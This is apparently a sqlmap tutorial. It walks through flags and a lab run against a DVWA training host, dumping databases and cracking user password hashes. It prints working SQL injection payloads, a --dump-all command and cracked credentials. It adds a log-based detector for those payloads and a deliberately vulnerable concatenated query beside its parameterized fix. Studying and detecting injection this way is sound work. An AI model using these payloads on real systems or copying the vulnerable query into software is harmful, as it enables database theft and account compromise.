SQLmap is an automated web vulnerability and SQL Injection detection and exploitation tool. It helps automate the enumeration of vulnerable applications, as well as the exploitation of SQL injection.
- https://sqlmap.org
- SQLmap's GitHub repository: https://github.com/sqlmapproject/sqlmap
## Usage

```plaintext
sqlmap [options]
```

or

```plaintext
python sqlmap.py [options]
```

Run sqlmap against a single target URL:

```plaintext
sqlmap [-u|--url] "http://www.example.com/vuln.php?id=1"
```

Send data in a POST request (`--data` implies a POST request):

```plaintext
python sqlmap.py [-u|--url] "http://www.example.com/vuln.php" --data="id=1"
```

## Essential & Targeting Flags

- `-u <url>`: Specify the target URL (e.g., `sqlmap -u "http://example.com"`).
- `-r <file>`: Load an HTTP request from a text file (useful for POST requests or authenticated endpoints).
- `-p <parameter>`: Manually define the parameter(s) to test for SQL injection.
- `--data=<string>`: Send a data string through a POST request.

## Scope & Testing Depth

- `--level=<1-5>`: Set the level of tests to perform (default 1). Increasing the level adds more payloads and checks (for example, additional headers and parameters are tested).
- `--risk=<1-3>`: Set the risk level of tests (default 1). Higher-risk tests can include dangerous, time-consuming queries that modify or damage data.
- `--technique=<B|E|U|S|T|Q>`: Specify the SQL injection techniques to use: Boolean-based blind, Error-based, UNION query, Stacked queries, Time-based blind, or inline Query.

## Enumeration Flags

- `--dbs`: Enumerate all databases accessible to the database user.
- `--tables`: Enumerate all tables within the specified (or current) database.
- `--columns`: Enumerate all columns within a specific table.
- `--schema`: Enumerate the entire database schema.

## Data Extraction & Dumping

- `--dump`: Extract all entries (rows) from a specific database, table, or column.
- `--dump-all`: Dump the entries of all available database tables.
- `-D <db>`: Specify the database name.
- `-T <table>`: Specify the table name.
- `-C <column>`: Specify the column name.

## WAF & Bypass

- `--tamper=<script>`: Use built-in or custom scripts to obfuscate payloads and bypass Web Application Firewalls (e.g., `--tamper=space2comment`).

## Operational Flags

- `--batch`: Automatically select the default answer for all prompts (skips manual user interaction).
- `--threads=<number>`: Maximum number of concurrent requests (speeds up data dumping).
- `--os-shell`: Prompt for an interactive operating system shell (allows arbitrary OS command execution).
If you don't want to add the flags to each command manually, use the `--wizard` flag. With this flag, the tool guides you through each step and asks questions to complete the scan.

The `--dbs` flag extracts all the database names. Once you know the database names, you can list the tables of one database with `-D database_name --tables`. After obtaining the tables, you can enumerate the records in a table with `-D database_name -T table_name --dump`.

If a web application uses GET parameters in its URLs to retrieve data, you can test that URL with the `-u` flag. This is HTTP GET-based testing: the parameters under test are the ones carried in the URL itself.

You can also perform POST-based testing, where the application sends data in the request body instead of the URL. Login forms and registration forms are typical examples. To follow this approach, intercept a POST request to the login or registration page and save it as a text file. Then pass that file to SQLMap with the `-r` flag, e.g. `sqlmap -r intercepted_request.txt`.

In real-world scenarios, many web applications rely on cookies to maintain user sessions, enforce authentication, or apply access controls. When testing such applications, simply providing a URL to SQLMap may not be sufficient, as unauthenticated requests could be redirected, denied, or return different content. SQLMap supports cookie-based testing via the `--cookie` flag, which lets you include session cookies (such as PHPSESSID, JSESSIONID, or authentication tokens) directly in the request. This ensures that SQLMap interacts with the application in the same authenticated or authorised context as a normal user. For example, after logging into an application in a browser and capturing the session cookie, you can pass it to SQLMap with `--cookie="SESSIONID=abcdef123456"` to test injection points that are only reachable after authentication.
## Example

Let's take a look at a quick example of how to use SQLmap to exploit an SQL injection vulnerability. Say that a host with IP address 10.1.1.14 is vulnerable to SQL injection. To automate the enumeration and exploitation of this vulnerability, you first connect to the vulnerable application and capture the HTTP GET request using a proxy. The example below shows the captured HTTP GET request. You can use this information to launch SQLmap against the vulnerable server (10.1.1.14).

HTTP GET Request to a Vulnerable Web Application

```plaintext
GET /dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit HTTP/1.1
Host: 10.1.1.14
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.1.1.14/dvwa/vulnerabilities/sqli/
Cookie: security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4
Connection: close
Upgrade-Insecure-Requests: 1
```

The first line of Example 10-15 (the captured request) shows the GET request's URI, including the `id` parameter that will be tested. The `Cookie` line shows the cookie and the session ID (PHPSESSID=1558e11b491da91be3b68e5cce953ca4), which SQLmap must send to be treated as the logged-in user.
Using the SQLmap Tool to Exploit an SQL Injection Vulnerability

```plaintext
root@kali:~# sqlmap -u "http://10.1.1.14/dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit" --cookie="security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4" --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:49:11

[21:49:11] [INFO] testing connection to the target URL
[21:49:11] [INFO] testing if the target URL content is stable
[21:49:12] [INFO] target URL content is stable
[21:49:12] [INFO] testing if GET parameter 'id' is dynamic
...<output omitted for brevity>...
[21:50:12] [INFO] target URL appears to have 2 columns in query
[21:50:12] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[21:50:12] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 201 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=omar' OR NOT 3391=3391#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270 UNION SELECT 5009 UNION SELECT 5751)a GROUP BY x)-- AxAS&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=omar' OR SLEEP(5)-- dxIW&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a4752487050494664786251457769674b666b4f74566843756e766764785546795679694159677a,0x716a717671),NULL#&Submit=Submit
---
[21:50:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[21:50:22] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[21:50:22] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.14'

[*] shutting down at 21:50:22
```

The first `[INFO]` lines in this example show how SQLmap automates the various tests and payloads sent to the vulnerable application; the injection-point summary lists the four techniques that worked against the `id` parameter and the payload used for each. The last few lines show how SQLmap was able to enumerate all the databases on the SQL server.
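Seen from the other side of the wire, each of the four injection types reported above leaves a recognisable pattern in the web server's access log. The following script is an added example, not code from the original page or from the sqlmap project: it parses combined-format access log lines (an assumed format), URL-decodes the request path, matches it against indicator patterns derived from the payload families shown in the sqlmap output above, and groups the hits by source IP so that a burst of probes (sqlmap needed 201 requests here) stands out. The log lines, IP addresses, timestamps and User-Agent strings are constructed sample data; the check on the User-Agent assumes sqlmap's stock UA string, which names the tool unless the operator overrides it.

```python
"""Flag sqlmap-style injection probes in web server access logs.

Added example, not part of the original page or of sqlmap. The indicator
patterns mirror the payload families sqlmap reported against the 'id'
parameter above (boolean-based 'OR NOT n=n', error-based FLOOR(RAND(0)*2),
time-based SLEEP(), UNION ALL SELECT with hex CONCAT markers). The access
log lines, IP addresses and User-Agent strings below are constructed.
"""
from __future__ import annotations

import re
from collections import Counter
from urllib.parse import quote, unquote_plus

# Apache/nginx "combined" log format (assumed): ip ident user [ts] "req" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# (indicator name, regex applied to the URL-decoded request path)
INDICATORS = [
    ("boolean_blind", re.compile(r"'\s*(OR|AND)\s+(NOT\s+)?\d+=\d+", re.I)),
    ("error_floor",   re.compile(r"FLOOR\(RAND\(0\)\*2\)", re.I)),
    ("time_sleep",    re.compile(r"\bSLEEP\(\d+\)", re.I)),
    ("union_select",  re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("hex_marker",    re.compile(r"CONCAT\(0x[0-9a-f]{6,}", re.I)),
    ("comment_tail",  re.compile(r"(#|--\s*\w*)(&|$)")),
]


def classify_request(path: str) -> list[str]:
    """Return the names of all indicators matching the decoded request path."""
    decoded = unquote_plus(path)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def parse_line(line: str) -> dict | None:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(lines, burst_threshold: int = 3) -> dict:
    """Group suspicious requests by source IP.

    A source is marked 'burst' once it has sent burst_threshold or more
    requests carrying indicators. sqlmap needed 201 requests to confirm
    the 'id' parameter above, so production thresholds can be much higher.
    """
    findings: dict[str, list[tuple[str, list[str]]]] = {}
    counts: Counter = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify_request(rec["path"])
        # sqlmap's stock User-Agent names the tool unless the operator
        # changes it (--user-agent / --random-agent); cheap but useful.
        if "sqlmap" in rec["ua"].lower():
            tags.append("sqlmap_user_agent")
        if tags:
            findings.setdefault(rec["ip"], []).append((rec["path"], tags))
            counts[rec["ip"]] += 1
    return {ip: {"requests": reqs, "burst": counts[ip] >= burst_threshold}
            for ip, reqs in findings.items()}


def _log(ip: str, query: str, ua: str) -> str:
    """Build one constructed combined-format log line for the DVWA path on the page."""
    path = "/dvwa/vulnerabilities/sqli/?" + quote(query, safe="=&")
    return f'{ip} - - [12/Mar/2024:21:49:11 +0000] "GET {path} HTTP/1.1" 200 1534 "-" "{ua}"'


FIREFOX = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
SQLMAP_UA = "sqlmap/1.0-example (https://sqlmap.org)"   # constructed stand-in

SAMPLE_LOG = [
    _log("10.1.1.50", "id=omar&Submit=Submit", FIREFOX),                        # legitimate
    _log("10.1.1.99", "id=omar' OR NOT 3391=3391#&Submit=Submit", SQLMAP_UA),   # boolean-based
    _log("10.1.1.99", "id=omar' OR SLEEP(5)-- dxIW&Submit=Submit", SQLMAP_UA),  # time-based
    _log("10.1.1.99", "id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a47,0x716a717671),NULL#&Submit=Submit", SQLMAP_UA),
    _log("10.1.1.77", "id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),"
                      "0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270)a GROUP BY x)-- AxAS&Submit=Submit", FIREFOX),
]

if __name__ == "__main__":
    for ip, info in scan_log(SAMPLE_LOG).items():
        print(ip, "burst" if info["burst"] else "single", [t for _, t in info["requests"]])
```

The last constructed line shows why the User-Agent check alone is not enough: the error-based probe arrives with a browser UA (as it would under `--random-agent`) and is caught only by its payload shape. Conversely, a WAF-evasion `--tamper` script changes the payload text, so the per-IP burst count is the signal that survives both tricks.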
When you have a list of all available databases, you can retrieve the tables and records of the dvwa database with the command shown in the next example.

Retrieving Sensitive Information from a Database

```plaintext
root@kali:~# sqlmap -u "http://10.1.1.14/dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit" --cookie="security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4" -D dvwa --dump-all
        ___
...<output omitted for brevity>...
[22:14:51] [INFO] resuming back-end DBMS 'mysql'
[22:14:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=omar' OR NOT 3391=3391#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270 UNION SELECT 5009 UNION SELECT 5751)a GROUP BY x)-- AxAS&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=omar' OR SLEEP(5)-- dxIW&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a4752487050494664786251457769674b666b4f74566843756e766764785546795679694159677a,0x716a717671),NULL#&Submit=Submit
---
[22:14:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[22:14:52] [INFO] fetching tables for database: 'dvwa'
[22:14:52] [WARNING] reflective value(s) found and filtering out
[22:14:52] [INFO] fetching columns for table 'users' in database 'dvwa'
[22:14:52] [INFO] fetching entries for table 'users' in database 'dvwa'
[22:14:52] [INFO] recognized possible password hashes in column 'password'
...<output omitted for brevity>...
[22:15:06] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[22:15:06] [INFO] starting 2 processes
[22:15:08] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[22:15:08] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[22:15:11] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[22:15:13] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwa
Table: users
[5 entries]
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                                                | password                                    | last_name | first_name |
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | http://172.16.123.129/dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | http://172.16.123.129/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | http://172.16.123.129/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | http://172.16.123.129/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | http://172.16.123.129/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+------------+

[22:15:17] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.14/dump/dvwa/users.csv'
[22:15:17] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[22:15:17] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment                 |
+------------+------+-------------------------+
| 1          | test | This is a test comment. |
+------------+------+-------------------------+

[22:15:17] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.sqlmap/output/10.1.1.14/dump/dvwa/guestbook.csv'
[22:15:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.14'

[*] shutting down at 22:15:17
```

The `cracked password` lines show how SQLmap was able to automatically enumerate the users of the compromised database and crack their (unsalted MD5) password hashes with its built-in dictionary attack; the dumped table then lists each hash with its recovered cleartext in parentheses.
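The root cause that makes both runs above possible is that the `id` value is pasted into the SQL text. The following is an added example, not code from the original page, DVWA or sqlmap: it seeds an in-memory SQLite table with the user rows sqlmap dumped above (avatar and password columns omitted), then runs the same lookup two ways, once by string concatenation and once with a bound parameter. The two probe strings are constructed from the page's boolean-based payload (`' OR NOT 3391=3391`), using the SQL-standard `-- ` comment that the page's time-based payload also uses, because SQLite does not treat `#` as a comment. The pair shows exactly what "boolean-based blind" detection measures: the row count differs between the false and true probes against the vulnerable query, and is identical (zero) against the parameterized one.

```python
"""Vulnerable vs. parameterized lookup behind the boolean-based blind probe.

Added example (not from the original page, DVWA or sqlmap). The table is
seeded with the users sqlmap dumped above; the probe strings are
constructed from the page's 'OR NOT 3391=3391' payload with a '-- '
comment tail, since SQLite has no MySQL-style '#' comment.
"""
from __future__ import annotations

import sqlite3

# user_id, user, first_name, last_name as in the dumped 'dvwa.users' table
USERS = [
    (1, "admin",   "admin",  "admin"),
    (2, "gordonb", "Gordon", "Brown"),
    (3, "1337",    "Hack",   "Me"),
    (4, "pablo",   "Pablo",  "Picasso"),
    (5, "smithy",  "Bob",    "Smith"),
]


def make_db() -> sqlite3.Connection:
    """Create a fresh in-memory database with the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user: str) -> list:
    """String concatenation: the caller's input becomes part of the SQL text."""
    sql = f"SELECT user, first_name, last_name FROM users WHERE user = '{user}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user: str) -> list:
    """Bound parameter: the input is only ever compared as a value, never parsed as SQL."""
    sql = "SELECT user, first_name, last_name FROM users WHERE user = ?"
    return conn.execute(sql, (user,)).fetchall()


# Constructed probe pair. Against the concatenated query the first makes the
# injected condition false (NOT 3391=3391) and the second makes it true
# (NOT 3391=3392); the trailing '-- x' comments out the closing quote.
PROBE_FALSE = "omar' OR NOT 3391=3391-- x"
PROBE_TRUE = "omar' OR NOT 3391=3392-- x"


def boolean_differential(lookup) -> tuple[int, int]:
    """Row counts returned for the false and true probes by the given lookup function."""
    conn = make_db()
    try:
        return len(lookup(conn, PROBE_FALSE)), len(lookup(conn, PROBE_TRUE))
    finally:
        conn.close()


if __name__ == "__main__":
    # (0, 5): the true probe returns every row, so the responses differ and
    # a boolean-based blind scanner can read one bit per request.
    print("vulnerable    :", boolean_differential(lookup_vulnerable))
    # (0, 0): no user is literally named "omar' OR NOT ...", so both probes
    # return nothing and there is no differential to exploit.
    print("parameterized :", boolean_differential(lookup_parameterized))
```

The fix is the second function, not input filtering: a `--tamper` script can rewrite the payload text, but it cannot make a bound parameter execute as SQL. Note that the parameterized lookup still returns the correct row for an ordinary username, so nothing is lost functionally.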